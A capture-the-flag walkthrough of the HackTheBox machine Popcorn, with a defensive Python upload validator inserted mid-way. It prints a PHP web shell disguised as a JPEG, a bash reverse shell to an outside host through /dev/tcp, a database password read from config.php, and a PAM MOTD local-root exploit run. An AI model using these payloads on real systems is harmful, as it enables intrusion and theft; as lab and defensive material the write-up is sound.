Popcorn is a relatively easy Linux machine, although the initial foothold is not very straightforward: you need to dig a bit to find it. Because this machine is running a pretty old Ubuntu version, there is more than one way to escalate privileges.
First, let's start nmap.
┌─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #nmap -sC -sT -oA nmap -n 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 20:39 CET
Nmap scan report for 10.10.10.6
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http
|_http-title: Site doesn't have a title (text/html).

Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds
Since on HackTheBox simple credentials do not work for SSH and bruteforcing is not the way to go (we don't even know the username), enumerating the web server seems like the only way forward. Directory enumeration will be done with gobuster (https://github.com/OJ/gobuster).
┌─[✗]─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #/home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.6
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.6/
[+] Threads      : 10
[+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
2019/03/20 20:53:10 Starting gobuster
/index (Status: 200)
/test (Status: 200)
/torrent (Status: 301)
/rename (Status: 301)
2019/03/20 20:59:31 Finished
Checking the directories found, /test reveals some information about the machine. This is definitely valuable information.
Exploitation / Initial Foothold
The directory /torrent, on the other hand, seems to be hosting a torrent web portal.
In the footer we can find the following information:
Copyright © 2007 TorrentHoster.com. All rights reserved
If we search Google for torrenthoster we will surely find the following page: https://packetstormsecurity.com/files/87275/Torrent-Hoster-XSS-Shell-Upload.html . According to this page, TorrentHoster has some upload vulnerabilities. All of them require authenticated access, though.
It seems we can create a user: simply sign up and log in with the newly created user.
There is an upload vulnerability.
We could try different file types, but they are not going to be uploaded. The application actually does some background checks on the torrent file as well: as soon as the file is uploaded, you will see some metadata about the torrent. We do, however, have another possibility: uploading our code as the screenshot.
If Burp (or a comparable program) is not already running, we should start it in order to intercept the upload and be able to change the headers.
To switch proxies in Firefox simply and quickly, I use the FoxyProxy extension with the following settings:
Of course, setting up FoxyProxy is not enough; you also have to make sure that Burp is set to intercept and FoxyProxy is activated. Intercepting a legitimate jpg upload first will make crafting the malicious PHP file easier later. We need to copy enough characters (bytes) to make the application believe that we are uploading a jpg. (You can read more about magic bytes here: https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/)
We can send the HTTP request to Repeater, but it is also saved in Burp under Target > Site map.
We can now upload our shell simply by pasting PHP code after the magic bytes plus some random bytes. I used very simple PHP code: <?php echo system($_REQUEST['cmd']); ?>. I also changed the file name to cmd.jpg.php and the content type to image/jpeg. This way we bypass more than one upload-blocking mechanism.
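The upload described above gets through because the application trusts things the client controls: the file name, the Content-Type header and the first few bytes of the body. The following validator is an added example (not TorrentHoster's code and not part of the original writeup) of the checks a screenshot-upload handler should do instead: it splits every extension so that cmd.jpg.php is not treated as a jpg, compares the magic bytes against the extension rather than the client-supplied Content-Type, refuses bodies that carry a PHP opening tag after a valid image header, and stores the file under a random server-chosen name. The sample payload is constructed to match the pattern the writeup uses (JPEG header, filler bytes, then PHP).

```python
import os
import re
import secrets

# Magic bytes for the image types a screenshot upload may accept.
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
GIF_MAGICS = (b"GIF87a", b"GIF89a")

# Whitelist: the server decides which extensions exist and which header each one must carry.
ALLOWED = {
    ".jpg": (JPEG_MAGIC,),
    ".jpeg": (JPEG_MAGIC,),
    ".png": (PNG_MAGIC,),
    ".gif": GIF_MAGICS,
}
ALLOWED_CONTENT_TYPES = {"image/jpeg", "image/png", "image/gif"}

# A real image header followed by a PHP opening tag is the polyglot the writeup uploads.
PHP_TAG = re.compile(rb"<\?php\b|<\?=")


def validate_screenshot(filename, content_type, data):
    """Return the list of reasons the upload is rejected; an empty list means accepted."""
    reasons = []

    # Strip any path the client sent and look at *every* extension, not just the last one,
    # so a double extension like cmd.jpg.php is rejected outright.
    base = os.path.basename(filename).lower()
    exts = ["." + part for part in base.split(".")[1:]]
    last = exts[-1] if exts else ""
    if len(exts) != 1:
        reasons.append("exactly one extension is required, got %r" % exts)
    if last not in ALLOWED:
        reasons.append("extension %r is not allowed" % last)

    # The Content-Type header is client-supplied; check it, but never rely on it alone.
    declared = content_type.lower().split(";")[0].strip()
    if declared not in ALLOWED_CONTENT_TYPES:
        reasons.append("content type %r is not allowed" % declared)

    # The body must start with the magic bytes that belong to the (whitelisted) extension.
    if not any(data.startswith(magic) for magic in ALLOWED.get(last, ())):
        reasons.append("file header does not match extension %r" % last)

    # Even with a correct header, a PHP tag anywhere in the body means this is not a screenshot.
    if PHP_TAG.search(data):
        reasons.append("PHP opening tag found in file body")

    return reasons


def stored_name(ext):
    """Never reuse the client's file name: random name plus the validated extension."""
    if ext not in ALLOWED:
        raise ValueError("extension must be validated first")
    return secrets.token_hex(16) + ext


# Constructed samples: a genuine-looking JPEG and the writeup's polyglot payload.
GOOD_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64
POLYGLOT = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
    + b"A" * 32
    + b"<?php echo system($_REQUEST['cmd']); ?>"
)

if __name__ == "__main__":
    for name, ctype, body in [
        ("screenshot.jpg", "image/jpeg", GOOD_JPEG),
        ("cmd.jpg.php", "image/jpeg", POLYGLOT),
        ("cmd.php", "image/jpeg", POLYGLOT),
    ]:
        problems = validate_screenshot(name, ctype, body)
        if problems:
            print("REJECT %s: %s" % (name, "; ".join(problems)))
        else:
            print("ACCEPT %s -> stored as %s" % (name, stored_name(".jpg")))
```

Note that the check on the file name is the one that matters most on a stack like this one: Apache's mod_php decides what to execute from the extension, so a random server-chosen name with a whitelisted extension, plus an upload directory with script execution disabled, removes the value of the polyglot regardless of what the body contains.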
I ran gobuster again against http://10.10.10.6/torrent/ to crawl this directory, since we need to find the upload folder to run the script (and to check whether it was uploaded at all).
┌─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #/home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.6/torrent -x php
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.6/torrent/
[+] Threads      : 10
[+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php
[+] Timeout      : 10s
2019/03/20 21:28:15 Starting gobuster
/images (Status: 301)
/download (Status: 200)
/download.php (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/rss (Status: 200)
/rss.php (Status: 200)
/login (Status: 200)
/login.php (Status: 200)
/templates (Status: 301)
/users (Status: 301)
/admin (Status: 301)
/health (Status: 301)
/browse (Status: 200)
/browse.php (Status: 200)
/comment (Status: 200)
/comment.php (Status: 200)
/upload (Status: 301)
/upload.php (Status: 200)
/css (Status: 301)
/edit (Status: 200)
/edit.php (Status: 200)
/lib (Status: 301)
/database (Status: 301)
We could have found the /upload folder just by guessing as well. Either way, our file was uploaded and it can be run.
Code execution is successful (see the output from the command cmd=whoami). We can also change the request method to POST to make the requests more readable and easier to modify.
Reverse shell command used: bash -i >& /dev/tcp/10.10.14.68/5555 0>&1
The command can be URL-encoded in Burp with CTRL+U (if using GET).
To check whether the attacker's machine can be reached, we can run a ping from the target and start tcpdump with an icmp filter.
Since the ping is reaching the attacker's (our) machine, we can try to get a shell now.
We've got a shell. We should now upgrade it to a fully interactive shell: press CTRL+Z to background the process, run stty raw -echo, type fg (no output will be shown) and press Enter.
There are some credentials in /var/www/torrent/config.php. Connect to the database with mysql -u torrent -D torrenthoster -p and type the SuperSecret!! password. I couldn't find anything useful in the database, apart from the hash of the Admin user, which I couldn't crack.
We can read the user flag.
www-data@popcorn:/var/www/torrent$ ls -la /home/george/
total 872
drwxr-xr-x 3 george george   4096 Mar 17  2017 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
-rw------- 1 root   root     2769 May  5  2017 .bash_history
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw------- 1 root   root     1571 Mar 17  2017 .mysql_history
-rw------- 1 root   root       19 May  5  2017 .nano_history
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Mar 17  2017 user.txt
www-data@popcorn:/var/www/torrent$ cat /home/george/user.txt
*deleted*
I ran the LinEnum script, but I couldn't find anything at first sight apart from the most obvious information: the machine is running a very old Ubuntu version. There is a high possibility that it is vulnerable to the Dirty COW exploit (https://dirtycow.ninja/).
www-data@popcorn:/home/george$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"
I did, however, find an exploit simply by checking searchsploit/exploit-db for "ubuntu 9.10". It has to do with MOTD (Message Of The Day) file tampering. We can find the MOTD file in the .cache folder, /home/george/.cache/, so we know it is installed. (https://www.exploit-db.com/exploits/14339)
┌─[luka@parrot]─[~/Desktop/htb/Popcorn]
└──╼ $searchsploit ubuntu 9.10
 Exploit Title                                        | Path
                                                      | (/usr/share/exploitdb/)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampe | exploits/linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampe | exploits/linux/local/14339.sh
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9 | exploits/linux/local/12130.py
Shellcodes: No Result
Papers: No Result
We can read the exploit with searchsploit -x 14339 and copy it from /usr/share/exploitdb/exploits/linux/local/14339.sh . I transferred the exploit to the Popcorn machine using wget.
If you copied this exploit like I did, you will definitely need to remove the carriage-return line endings with sed -i 's/\r//' 14339.sh and make it executable with chmod +x 14339.sh
www-data@popcorn:/tmp$ chmod +x 14339.sh
www-data@popcorn:/tmp$ sed -i 's/\r//' 14339.sh
www-data@popcorn:/tmp$ bash 14339.sh
 Ubuntu PAM MOTD local root
 SSH key set up
 spawn ssh
[+] owned: /etc/passwd
 spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password:
root@popcorn:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@popcorn:/tmp# cat /root/root.txt
*deleted*
We've got root access and we can read the flag.